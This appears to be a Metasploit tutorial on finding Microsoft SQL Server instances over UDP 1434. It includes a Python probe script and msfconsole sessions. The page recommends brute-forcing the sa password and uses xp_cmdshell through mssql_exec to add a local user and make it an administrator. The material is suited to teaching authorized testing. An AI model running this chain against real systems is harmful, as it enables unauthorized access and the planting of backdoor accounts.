
metasploit - Hunting for MSSQL

Using UDP footprinting, we can search for and locate MSSQL installations on an internal network. When MSSQL is installed, it listens either on TCP port 1433 or on a random dynamic TCP port. If the port is dynamic, querying UDP port 1434 (the SQL Server Browser service) gives us information about the server, including the TCP port the service is actually listening on.
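The UDP/1434 exchange described above is the SQL Server Resolution Protocol (MS-SQLR), answered by the SQL Server Browser service. As an added example (not code from the original page or from Metasploit), the Python below builds the probe, parses the reply the same way mssql_ping has to, and shows why the answer matters: the `tcp` field is the port a named instance on a dynamic port really listens on. The host name, instance names, version strings and the sample datagram are constructed for this example; only `discover` performs real network I/O, and it runs only when a host argument is supplied.

```python
"""SQL Server Resolution Protocol (SSRP, MS-SQLR) over UDP/1434.

Added example (not code from the original page or from Metasploit): it
reproduces the SSRP exchange behind mssql_ping so the UDP/1434 traffic can
be seen byte for byte. SAMPLE_RESPONSE is CONSTRUCTED for this example; it
mirrors the default instance from the page's scan and adds a hypothetical
named instance on a dynamic port.
"""
import socket
import sys
from typing import Dict, List, Optional

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x03"    # unicast: describe every instance on this host
CLNT_BCAST_EX = b"\x02"    # same request sent to a broadcast address
CLNT_UCAST_INST = b"\x04"  # describe one named instance
SVR_RESP = 0x05            # first byte of every Browser-service reply


def build_probe(instance: Optional[str] = None) -> bytes:
    """Build the one-datagram request that the SQL Server Browser answers."""
    if instance is None:
        return CLNT_UCAST_EX
    # CLNT_UCAST_INST is the opcode followed by the NUL-terminated instance name.
    return CLNT_UCAST_INST + instance.encode("ascii") + b"\x00"


def parse_ssrp_response(datagram: bytes) -> List[Dict[str, str]]:
    """Parse a SVR_RESP datagram into one dict per advertised instance.

    Layout: 0x05, 2-byte little-endian payload length, then an ASCII string of
    "key;value;" pairs. Each instance's block is terminated by ";;".
    """
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    length = int.from_bytes(datagram[1:3], "little")
    payload = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for block in payload.split(";;"):
        if not block:
            continue
        fields = block.split(";")
        # Pair keys with values; an odd trailing token (malformed reply) is dropped.
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def listening_port(info: Dict[str, str]) -> Optional[int]:
    """TCP port the instance accepts TDS on, or None if it only offers named pipes."""
    return int(info["tcp"]) if "tcp" in info else None


def discover(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send CLNT_UCAST_EX to host:1434 and parse the reply (real network I/O)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, SSRP_PORT))
        data, _ = sock.recvfrom(65535)
    return parse_ssrp_response(data)


def encode_response(payload: str) -> bytes:
    """Wrap a payload string in the SVR_RESP header (used to build the sample)."""
    body = payload.encode("ascii")
    return bytes([SVR_RESP]) + len(body).to_bytes(2, "little") + body


# CONSTRUCTED sample reply: the page's default instance plus a hypothetical
# SQLEXPRESS instance on a dynamic port, the case UDP/1434 exists to solve.
SAMPLE_RESPONSE = encode_response(
    "ServerName;SSHACKTHISBOX-0;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;8.00.194;tcp;1433;np;\\\\SSHACKTHISBOX-0\\pipe\\sql\\query;;"
    "ServerName;SSHACKTHISBOX-0;InstanceName;SQLEXPRESS;IsClustered;No;"
    "Version;10.50.1600.1;tcp;49172;;"
)


if __name__ == "__main__":
    # With a host argument, probe it for real; otherwise parse the sample.
    found = discover(sys.argv[1]) if len(sys.argv) > 1 else parse_ssrp_response(SAMPLE_RESPONSE)
    for inst in found:
        print(f"{inst.get('ServerName')}\\{inst.get('InstanceName')} "
              f"version={inst.get('Version')} tcp={listening_port(inst)} np={inst.get('np')}")
```

If the Browser service is stopped or UDP/1434 is filtered, no reply comes back and you fall back to a TCP probe of 1433 (or whatever static port the instance was given). On the defensive side, that same exposure is the reason to disable or firewall the Browser service on hosts that do not need it: a single unauthenticated datagram reveals host name, instance names, versions and listening ports.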

Let's search for and load the MSSQL ping module in msfconsole.

msf > search mssql

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   auxiliary/admin/mssql/mssql_enum                                           normal     Microsoft SQL Server Configuration Enumerator
   auxiliary/admin/mssql/mssql_enum_domain_accounts                           normal     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                      normal     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                                normal     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_dbowner                               normal     Microsoft SQL Server Escalate Db_Owner
   auxiliary/admin/mssql/mssql_escalate_dbowner_sqli                          normal     Microsoft SQL Server SQLi Escalate Db_Owner
   auxiliary/admin/mssql/mssql_escalate_execute_as                            normal     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                       normal     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/mssql/mssql_exec                                           normal     Microsoft SQL Server xp_cmdshell Command Execution
   auxiliary/admin/mssql/mssql_findandsampledata                              normal     Microsoft SQL Server Find and Sample Data
   auxiliary/admin/mssql/mssql_idf                                            normal     Microsoft SQL Server Interesting Data Finder
   auxiliary/admin/mssql/mssql_ntlm_stealer                                   normal     Microsoft SQL Server NTLM Stealer
   auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                              normal     Microsoft SQL Server SQLi NTLM Stealer
   auxiliary/admin/mssql/mssql_sql                                            normal     Microsoft SQL Server Generic Query
   auxiliary/admin/mssql/mssql_sql_file                                       normal     Microsoft SQL Server Generic Query from File
   auxiliary/analyze/jtr_mssql_fast                                           normal     John the Ripper MS SQL Password Cracker (Fast Mode)
   auxiliary/gather/lansweeper_collector                                      normal     Lansweeper Credential Collector
   auxiliary/scanner/mssql/mssql_hashdump                                     normal     MSSQL Password Hashdump
   auxiliary/scanner/mssql/mssql_login                                        normal     MSSQL Login Utility
   auxiliary/scanner/mssql/mssql_ping                                         normal     MSSQL Ping Utility
   auxiliary/scanner/mssql/mssql_schemadump                                   normal     MSSQL Schema Dump
   auxiliary/server/capture/mssql                                             normal     Authentication Capture: MSSQL
   exploit/windows/iis/msadc                                 1998-07-17       excellent  MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
   exploit/windows/mssql/lyris_listmanager_weak_pass         2005-12-08       excellent  Lyris ListManager MSDE Weak sa Password
   exploit/windows/mssql/ms02_039_slammer                    2002-07-24       good       MS02-039 Microsoft SQL Server Resolution Overflow
   exploit/windows/mssql/ms02_056_hello                      2002-08-05       good       MS02-056 Microsoft SQL Server Hello Overflow
   exploit/windows/mssql/ms09_004_sp_replwritetovarbin       2008-12-09       good       MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
   exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli  2008-12-09       excellent  MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
   exploit/windows/mssql/mssql_clr_payload                   1999-01-01       excellent  Microsoft SQL Server Clr Stored Procedure Payload Execution
   exploit/windows/mssql/mssql_linkcrawler                   2000-01-01       great      Microsoft SQL Server Database Link Crawling Command Execution
   exploit/windows/mssql/mssql_payload                       2000-05-30       excellent  Microsoft SQL Server Payload Execution
   exploit/windows/mssql/mssql_payload_sqli                  2000-05-30       excellent  Microsoft SQL Server Payload Execution via SQL Injection
   post/windows/gather/credentials/mssql_local_hashdump                       normal     Windows Gather Local SQL Server Hash Dump
   post/windows/manage/mssql_local_auth_bypass                                normal     Windows Manage Local Microsoft SQL Server Authorization Bypass

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = \\SSHACKTHISBOX-0\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

The first command we issued searches for any mssql-related modules. The second instruction, use auxiliary/scanner/mssql/mssql_ping, loads the scanner module for us.

Next, show options lets us see what needs to be specified. Setting RHOSTS to 10.211.55.1/24 starts the search for SQL servers across that subnet. You can specify a /16 or whatever range you want to use. Increasing THREADS is recommended, since a single-threaded scan of a large range can take a very long time.

Once the run (or exploit) command is issued, the scan executes and pulls back specific information about the MSSQL server. As we can see, the machine is named "SSHACKTHISBOX-0" and the TCP listener is on port 1433.

At this point you could use the auxiliary/scanner/mssql/mssql_login module to brute-force the password by passing the module a dictionary file. Alternatively, you can do the same with medusa or THC-Hydra. Once the password has been guessed, there is a neat little module for executing the xp_cmdshell stored procedure. Keep in mind that xp_cmdshell requires sysadmin rights on the instance (the sa login has them) and is disabled by default on SQL Server 2005 and later, so a guessed low-privilege login will not get you this far.

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set PASSWORD password
PASSWORD => password
msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD
CMD => net user bacon ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.

[*] Auxiliary module execution completed

Looking at the output of "net user bacon ihazpassword /ADD", we have successfully added a user account named "bacon"; from there we can issue "net localgroup administrators bacon /ADD" to obtain local administrator on the system itself. At that point we have full control of the system. Note that xp_cmdshell runs commands in the security context of the SQL Server service account, so this step only succeeds if that account already holds local administrator rights (for example LocalSystem, or a domain account placed in the local Administrators group). On an install that runs SQL Server under a low-privilege service account, even the net user command above fails with access denied, and you are limited to what that service account can do.
